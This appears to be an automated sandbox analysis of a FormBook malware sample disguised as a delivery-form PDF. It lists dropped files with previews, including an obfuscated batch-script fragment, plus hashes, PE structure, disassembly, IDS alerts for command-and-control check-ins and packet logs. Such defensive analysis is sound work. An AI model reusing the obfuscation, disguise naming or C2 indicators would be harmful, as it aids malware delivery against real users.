                                                                                        • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                                        • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                                        • Filename: PRODUCT.bat, Detection: malicious, Browse
                                                                                        • Filename: purchaseorder.bat, Detection: malicious, Browse
                                                                                        • Filename: PO11550.exe, Detection: malicious, Browse
                                                                                        • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse
                                                                                        • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                        C:\Users\Public\Lwnkboxd.url

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Lwnkboxd.PIF">), ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):104
                                                                                        Entropy (8bit):5.133038459576723
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMCBvsbxHO1KIAVy:HRYFVmTWDyzHExuA9s
                                                                                        MD5:64C4DFE05A58648679EAC4524CAB3C0B
                                                                                        SHA1:1B1175E38FDF4A1CD818A3D11D34D01D144C607B
                                                                                        SHA-256:1BECAF494B81436056255069F8FBDB83A75BC29EBC378D227A350DA6900F84C6
                                                                                        SHA-512:A87BEBF6EDF7A513E0EC610589792E3DC38962844C9E4EAB35D1E89CB675B8C3598A4D74C0CA8EC2177AE444D4F71F8D48495B9113CBB6EB2070BBDAEEFC438B
                                                                                        Malicious:true
                                                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Lwnkboxd.PIF"..IconIndex=923454..HotKey=48..

                                                                                        C:\Users\Public\LwnkboxdF.cmd

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15789
                                                                                        Entropy (8bit):4.658965888116939
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                        MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                        SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                        SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                        SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                        Malicious:false
                                                                                        Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                                        C:\Users\user\AppData\Local\Temp\0j0OId92L

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\proquota.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.739262242253885
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                        • InstallShield setup (43055/19) 0.43%
                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        File name:Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        File size:1'444'352 bytes
                                                                                        MD5:9e67c73f86b034d009280ab03db20124
                                                                                        SHA1:aba6a0de8e85cf5a84c0a158d3908189ecf29330
                                                                                        SHA256:b55cf6b5ec66fdc4dbbecc4e2f7698549964ec234bd0b55d057527d59d91147d
                                                                                        SHA512:22ecfa7f450a2edbdb964a900524069f9b12804d691d204eda66efb6c2eb212e8e81229cc5e27626ea699749a72107adb45fce5a7ae4dd21f7fe4d4ea33ab9ff
                                                                                        SSDEEP:24576:Gae+1jKFTxeZhauIhY8oYsO0COg21wu0L8U:Ge16FeGrI/g21W8U
                                                                                        TLSH:F9655B91A61387E1D27609343F0772F9A82D3C1CAA34A58E6FDC1D6EE971942EC33572
                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                        File Icon

                                                                                        Icon Hash:1b2b4380030b8b4b

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x49375c
                                                                                        Entrypoint Section:.itext
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f0e442fd53b74b3dd79fc9c49606a925

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        add esp, FFFFFFF0h
                                                                                        push ebx
                                                                                        mov eax, 00492050h
                                                                                        call 00007F80650F07ECh
                                                                                        mov ebx, dword ptr [00495FE0h]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        call 00007F8065152C9Fh
                                                                                        mov ecx, dword ptr [00495EE4h]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        mov edx, dword ptr [00490994h]
                                                                                        call 00007F8065152CA4h
                                                                                        mov ecx, dword ptr [00495E1Ch]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        mov edx, dword ptr [0048B62Ch]
                                                                                        call 00007F8065152C91h
                                                                                        mov ecx, dword ptr [00496174h]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        mov edx, dword ptr [00490608h]
                                                                                        call 00007F8065152C7Eh
                                                                                        mov ecx, dword ptr [00495D78h]
                                                                                        mov eax, dword ptr [ebx]
                                                                                        mov edx, dword ptr [004907F8h]
                                                                                        call 00007F8065152C6Bh
                                                                                        mov eax, dword ptr [ebx]
                                                                                        call 00007F8065152CE4h
                                                                                        pop ebx
                                                                                        call 00007F80650EE616h
                                                                                        nop
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b0000x2b9a.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000xbf200.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xa65c.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x9f0000x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x9b8340x6cc.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x912b80x914003aaad673943a670890133def3eba7b57False0.5050643421901894data6.519503495540056IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .itext0x930000x7d40x800a0ab1580d6787b09c0e91d664e4d1825False0.62109375data6.184238549726377IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .data0x940000x21ac0x2200ed0dc071a700ac9bc77c71679030999fFalse0.40245863970588236data3.8564608652069694IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .bss0x970000x372c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .idata0x9b0000x2b9a0x2c00813fd04ec31be6470c47a2f6de69e507False0.3194247159090909data5.194560124661258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0x9e0000x400x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rdata0x9f0000x180x200ab98651063e68dcd71c0ccc744e1f5cfFalse0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xa00000xa65c0xa800def97e06039844648b4361fc5490eeefFalse0.5651739211309523data6.650670111191524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xab0000xbf2000xbf200716a4e3999432de9d1f2a34d29178c5fFalse0.404576622792675data6.10872507016811IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_CURSOR0xabefc0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                        RT_CURSOR0xac0300x134dataEnglishUnited States0.4642857142857143
                                                                                        RT_CURSOR0xac1640x134dataEnglishUnited States0.4805194805194805
                                                                                        RT_CURSOR0xac2980x134dataEnglishUnited States0.38311688311688313
                                                                                        RT_CURSOR0xac3cc0x134dataEnglishUnited States0.36038961038961037
                                                                                        RT_CURSOR0xac5000x134dataEnglishUnited States0.4090909090909091
                                                                                        RT_CURSOR0xac6340x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                        RT_BITMAP0xac7680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                        RT_BITMAP0xac9380x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                        RT_BITMAP0xacb1c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                        RT_BITMAP0xaccec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                        RT_BITMAP0xacebc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                        RT_BITMAP0xad08c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                        RT_BITMAP0xad25c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                        RT_BITMAP0xad42c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                        RT_BITMAP0xad5fc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                        RT_BITMAP0xad7cc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                        RT_BITMAP0xad99c0x9c6e8Device independent bitmap graphic, 1002 x 213 x 24, image size 640704EnglishUnited States0.45959540783838787
                                                                                        RT_BITMAP0x14a0840xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                                        RT_BITMAP0x14a1440xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                                        RT_BITMAP0x14a2240xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                                        RT_BITMAP0x14a3040xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                                        RT_BITMAP0x14a3e40xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                                        RT_BITMAP0x14a4a40xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                                        RT_BITMAP0x14a5640xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                                        RT_BITMAP0x14a6440xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                                        RT_BITMAP0x14a7040xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                                        RT_BITMAP0x14a7e40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                        RT_BITMAP0x14a8cc0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                                        RT_BITMAP0x14a98c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                                        RT_ICON0x14aa6c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.2969858156028369
                                                                                        RT_ICON0x14aed40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.20040983606557378
                                                                                        RT_ICON0x14b85c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.14681050656660413
                                                                                        RT_ICON0x14c9040x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.10394190871369295
                                                                                        RT_ICON0x14eeac0x1249PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9374065370647298
                                                                                        RT_DIALOG0x1500f80x52data0.7682926829268293
                                                                                        RT_DIALOG0x15014c0x52data0.7560975609756098
                                                                                        RT_STRING0x1501a00x1b4data0.4954128440366973
                                                                                        RT_STRING0x1503540x314data0.39847715736040606
                                                                                        RT_STRING0x1506680x338data0.4575242718446602
                                                                                        RT_STRING0x1509a00xb8data0.6793478260869565
                                                                                        RT_STRING0x150a580xf8data0.6290322580645161
                                                                                        RT_STRING0x150b500x22cdata0.5
                                                                                        RT_STRING0x150d7c0x3f0data0.39186507936507936
                                                                                        RT_STRING0x15116c0x3c0data0.38333333333333336
                                                                                        RT_STRING0x15152c0x388data0.4092920353982301
                                                                                        RT_STRING0x1518b40x3f0data0.35119047619047616
                                                                                        RT_STRING0x151ca40x190data0.4975
                                                                                        RT_STRING0x151e340xccdata0.6225490196078431
                                                                                        RT_STRING0x151f000x1c4data0.5376106194690266
                                                                                        RT_STRING0x1520c40x3c8data0.3181818181818182
                                                                                        RT_STRING0x15248c0x338data0.42961165048543687
                                                                                        RT_STRING0x1527c40x294data0.42424242424242425
                                                                                        RT_RCDATA0x152a580x10data1.5
                                                                                        RT_RCDATA0x152a680x334data0.6963414634146341
                                                                                        RT_RCDATA0x152d9c0x9841dataEnglishUnited States0.040511070631398007
                                                                                        RT_RCDATA0x15c5e00xda16Delphi compiled form 'TfrmMain'0.08751567257746731
                                                                                        RT_GROUP_CURSOR0x169ff80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                        RT_GROUP_CURSOR0x16a00c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                        RT_GROUP_CURSOR0x16a0200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_CURSOR0x16a0340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_CURSOR0x16a0480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_CURSOR0x16a05c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_CURSOR0x16a0700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_ICON0x16a0840x4cdata0.8289473684210527

                                                                                        Imports

                                                                                        DLLImport
                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                        user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                        kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                        user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                        msimg32.dllGradientFill
                                                                                        gdi32.dllUnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                        kernel32.dlllstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                        ole32.dllCoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                        kernel32.dllSleep
                                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                        comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                        winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                                                                                        comdlg32.dllGetSaveFileNameA, GetOpenFileNameA

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-26T11:52:01.872987+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.217.19.238443TCP
                                                                                        2024-12-26T11:52:04.721007+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732142.250.181.97443TCP
                                                                                        2024-12-26T11:53:08.269717+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449756199.59.243.22780TCP
                                                                                        2024-12-26T11:53:08.269717+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449756199.59.243.22780TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 26, 2024 11:52:00.062370062 CET49730443192.168.2.4172.217.19.238
                                                                                        Dec 26, 2024 11:52:00.062472105 CET44349730172.217.19.238192.168.2.4
                                                                                        Dec 26, 2024 11:52:00.062568903 CET49730443192.168.2.4172.217.19.238
                                                                                        Dec 26, 2024 11:52:00.062714100 CET49730443192.168.2.4172.217.19.238
                                                                                        Dec 26, 2024 11:52:00.062841892 CET44349730172.217.19.238192.168.2.4
                                                                                        Dec 26, 2024 11:52:00.062902927 CET49730443192.168.2.4172.217.19.238
